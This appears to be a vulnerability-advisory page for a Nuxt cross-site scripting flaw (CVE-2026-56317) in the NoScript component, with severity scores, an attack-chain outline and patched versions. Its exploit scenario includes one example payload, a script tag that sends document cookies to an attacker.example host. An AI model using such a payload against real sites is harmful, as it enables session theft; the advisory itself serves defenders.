Skip to main content

Nuxt CVE-2026-56317

| EUVDEUVD-2026-38112 LOW
Cross-site Scripting (XSS) (CWE-79)
2026-06-20 VulnCheck GHSA-xppm-jmw6-fhmf
2.3
CVSS 4.0 · Vendor: VulnCheck

Severity by source

Vendor (VulnCheck) PRIMARY
2.3 LOW
CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
vuln.today AI
4.7 MEDIUM

AC:H because exploitation requires application code to pass attacker-controlled input into a NoScript slot; S:C because the injected script escapes the noscript element into the document context.

3.1 AV:N/AC:H/PR:N/UI:R/S:C/C:L/I:L/A:N
4.0 AV:N/AC:L/AT:P/PR:N/UI:P/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N

Primary rating from Vendor (VulnCheck).

CVSS VectorVendor: VulnCheck

CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Attack Vector
Network
Attack Complexity
Low
Privileges Required
None
User Interaction
P
Scope
X

Lifecycle Timeline

2
Source Code Evidence Fetched
Jun 22, 2026 - 06:15 vuln.today
Analysis Generated
Jun 22, 2026 - 06:15 vuln.today

DescriptionCVE.org

Nuxt before 4.4.7 (and the 3.x branch before 3.21.7) contains a cross-site scripting vulnerability in the NoScript component that writes slot content to innerHTML without escaping. Attackers can inject malicious scripts through untrusted data in NoScript slots, such as route.query parameters, which execute in the document context when the noscript tag is implicitly closed by script tags.

AnalysisAI

Cross-site scripting in Nuxt's globally registered NoScript component allows unauthenticated remote attackers to execute arbitrary JavaScript in a victim's browser by injecting payload via attacker-controlled slot content, such as URL query parameters. The vulnerability exists in both supported release lines - 3.x before 3.21.7 and 4.x before 4.4.7 - and is rooted in the server-side rendering pipeline writing slot content to innerHTML without escaping, bypassing Vue's normal template sanitization. …

Unlock full vulnerability intelligence

  • Risk assessment & exploitation conditions
  • Attack chain visualization
  • Remediation with exact patch versions
  • Threat intelligence from 22 sources
  • Personal watchlist & email alerts

Free forever · No credit card required

Attack ChainAIDerived

Hypothetical attack flow derived from CVE metadata

Recon
Identify Nuxt SSR page interpolating query params into NoScript slot
Delivery
Craft URL embedding script tag payload in query parameter
Exploit
Deliver crafted URL to victim via phishing or redirect
Install
Victim browser requests URL from Nuxt SSR server
C2
Server writes unescaped payload to noscript innerHTML
Execute
HTML parser implicitly closes noscript and reprocesses script tag in document head
Impact
Injected script executes and exfiltrates session cookies

Vulnerability AssessmentAI

Exploitation Exploitation requires that the target Nuxt application contains code that explicitly renders attacker-controllable data inside a NoScript slot - for example, a component or page containing NoScript with route.query.someParam or equivalent attacker-influenced input. … Additional conditions and limiting factors are described in the full assessment.
Risk Assessment The CVSS 4.0 score of 2.3 (AV:N/AC:L/AT:P/PR:N/UI:P/VC:L/VI:L/VA:N) is internally consistent with the technical description and appropriately low. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in.
Exploit Scenario An attacker identifies a Nuxt SSR application that renders a page containing NoScript with a query parameter interpolated into its slot, such as NoScript with route.query.banner. The attacker crafts a URL appending a query string like banner=<script>fetch('https://attacker.example/?c='+document.cookie)</script> and delivers it to a victim via phishing or a malicious redirect. …
Remediation Vendor-released patches are available: upgrade to nuxt@4.4.7 for 4.x users or nuxt@3.21.7 for 3.x users, as confirmed in GHSA-m3q2-p4fw-w38m. … Detailed patch versions, workarounds, and compensating controls in full report.

Threat intelligence, references, and detailed analysis are available after sign-in.

More in Nuxt

View all
CVE-2023-3224 CRITICAL POC
9.8 Jun 13

Code Injection in GitHub repository nuxt/nuxt prior to 3.5.3. Rated critical severity (CVSS 9.8), this vulnerability is

CVE-2024-34344 HIGH POC
8.8 Aug 05

Nuxt is a free and open-source framework to create full-stack web applications and websites with Vue.js. Rated high seve

CVE-2024-23657 HIGH POC
8.8 Aug 05

Nuxt is a free and open-source framework to create full-stack web applications and websites with Vue.js. Rated high seve

CVE-2024-42352 HIGH POC
7.5 Aug 05

Nuxt is a free and open-source framework to create full-stack web applications and websites with Vue.js. Rated high seve

CVE-2024-34343 MEDIUM POC
6.1 Aug 05

Nuxt is a free and open-source framework to create full-stack web applications and websites with Vue.js. Rated medium se

CVE-2023-0878 MEDIUM POC
6.1 Feb 17

Cross-site Scripting (XSS) - Generic in GitHub repository nuxt/framework prior to 3.2.1. Rated medium severity (CVSS 6.1

CVE-2023-2138 CRITICAL
9.8 Apr 18

Use of Hard-coded Credentials in GitHub repository nuxtlabs/github-module prior to 1.6.2. Rated critical severity (CVSS

CVE-2026-41248 CRITICAL
9.1 Apr 24

Clerk JavaScript is the official JavaScript repository for Clerk authentication. createRouteMatcher in @clerk/nextjs, @c

CVE-2026-53721 HIGH
8.8 Jun 12

Route-rule middleware bypass in Nuxt 3.11.0-3.21.6 and 4.0.0-4.4.6 allows remote attackers to evade routeRules-defined p

CVE-2025-27415 HIGH
7.5 Mar 19

Nuxt is an open-source web development framework for Vue.js. Rated high severity (CVSS 7.5), this vulnerability is remot

CVE-2025-59414 LOW POC
3.1 Sep 17

Nuxt is an open-source web development framework for Vue.js. Rated low severity (CVSS 3.1), this vulnerability is remote

CVE-2026-56301 MEDIUM
6.8 Jun 23

Nuxt's development server on Linux exposes an unprotected vite-node IPC server via a Linux abstract-namespace Unix socke

Share

CVE-2026-56317 vulnerability details – vuln.today

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy